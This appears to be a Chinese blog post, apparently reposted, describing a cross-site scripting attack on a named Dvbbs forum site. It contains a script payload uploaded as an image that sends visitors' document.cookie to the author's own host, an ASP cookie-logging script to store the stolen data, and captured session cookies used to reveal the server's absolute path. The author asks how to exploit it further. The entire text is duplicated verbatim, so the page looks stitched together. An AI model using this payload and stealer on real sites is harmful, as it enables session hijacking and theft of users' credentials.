关于动网的cookie泻露站点绝路径的问题
177人参与 • 2024-05-19 • 安全编程
一、跨站测试
先看看我的一次跨站测试吧
我以职业欠钱的站点做测试吧:
host:zhiyeqianqian.51web.cn
my test:
先在他的论谈上传两张图,
图一的内容是:
<script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script>
得到url为uploadfile/2005-6/200562716565777847.jpg
图二则是偶的个人照
uploadfile/2005-6/200562716563048909.jpg
写个盗cookie的代码到我的空间,lcx的盗cookie代码有问题,所以修改了一下。
<%
cookiefile=server.mappath("cookie.txt")
set fs=server.createobject("scripting.filesystemobject")
set cookiefile=fs.opentextfile(cookiefile,8,true,0)
cookiefile.write(request.querystring&"<br>")
cookiefile.close
set fs = nothing
%>
<meta http-equiv="refresh" content="0;url= http://zhiyeqianqian.51web.cn/uploadfile/2005-6/200562716563048909.jpg">
接下来,点击图一,自动转到图二,
二、结果分析
再到我的空间看一下,抓到cookie如下:
msg=ewwwrootzhiyeqianqianwwwroot=userid=218&usercookies=1&statuserid=2190418138&password=想要吗?嘿嘿&userhidden=2&userclass=%d0%c2%ca%d6%c9%cf%c2%b7&username=linzi;%20aspsessionidqscaaqtb=hmplnimdhocdjkpelpgbboog;%20dvbbs;%20dvbbsmagicface=862;%20upnum=2;%20aspsessionidqsaaartb=jbppmonddegfgheoicdhfjim<br>
分析cookie我们不难看出他的绝对路径是e:\wwwroot\zhiyeqianqian\wwwroot
三、论谈
本来,最初的测试我是在测试bct论谈,成功暴出他的绝对路径,一开始的时候,我还认为可能又是动网出洞洞了,所以又去测试了其它几个站,测试结果是其它的站点并没有暴出路径,今天再次测试“欠我钱”的论谈,却又暴不出来,查了一下代码,和别人的代码一个样,根本没什么差别。
偶想听听大家的看法,到底是哪里出了问题,能不能深入利用~~~
先看看我的一次跨站测试吧
我以职业欠钱的站点做测试吧:
host:zhiyeqianqian.51web.cn
my test:
先在他的论谈上传两张图,
图一的内容是:
<script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script>
得到url为uploadfile/2005-6/200562716565777847.jpg
图二则是偶的个人照
uploadfile/2005-6/200562716563048909.jpg
写个盗cookie的代码到我的空间,lcx的盗cookie代码有问题,所以修改了一下。
<%
cookiefile=server.mappath("cookie.txt")
set fs=server.createobject("scripting.filesystemobject")
set cookiefile=fs.opentextfile(cookiefile,8,true,0)
cookiefile.write(request.querystring&"<br>")
cookiefile.close
set fs = nothing
%>
<meta http-equiv="refresh" content="0;url= http://zhiyeqianqian.51web.cn/uploadfile/2005-6/200562716563048909.jpg">
接下来,点击图一,自动转到图二,
二、结果分析
再到我的空间看一下,抓到cookie如下:
msg=ewwwrootzhiyeqianqianwwwroot=userid=218&usercookies=1&statuserid=2190418138&password=想要吗?嘿嘿&userhidden=2&userclass=%d0%c2%ca%d6%c9%cf%c2%b7&username=linzi;%20aspsessionidqscaaqtb=hmplnimdhocdjkpelpgbboog;%20dvbbs;%20dvbbsmagicface=862;%20upnum=2;%20aspsessionidqsaaartb=jbppmonddegfgheoicdhfjim<br>
分析cookie我们不难看出他的绝对路径是e:\wwwroot\zhiyeqianqian\wwwroot
三、论谈
本来,最初的测试我是在测试bct论谈,成功暴出他的绝对路径,一开始的时候,我还认为可能又是动网出洞洞了,所以又去测试了其它几个站,测试结果是其它的站点并没有暴出路径,今天再次测试“欠我钱”的论谈,却又暴不出来,查了一下代码,和别人的代码一个样,根本没什么差别。
偶想听听大家的看法,到底是哪里出了问题,能不能深入利用~~~
赞 (0)
打赏
微信扫一扫
微信扫一扫
您想发表意见!!点此发布评论
发表评论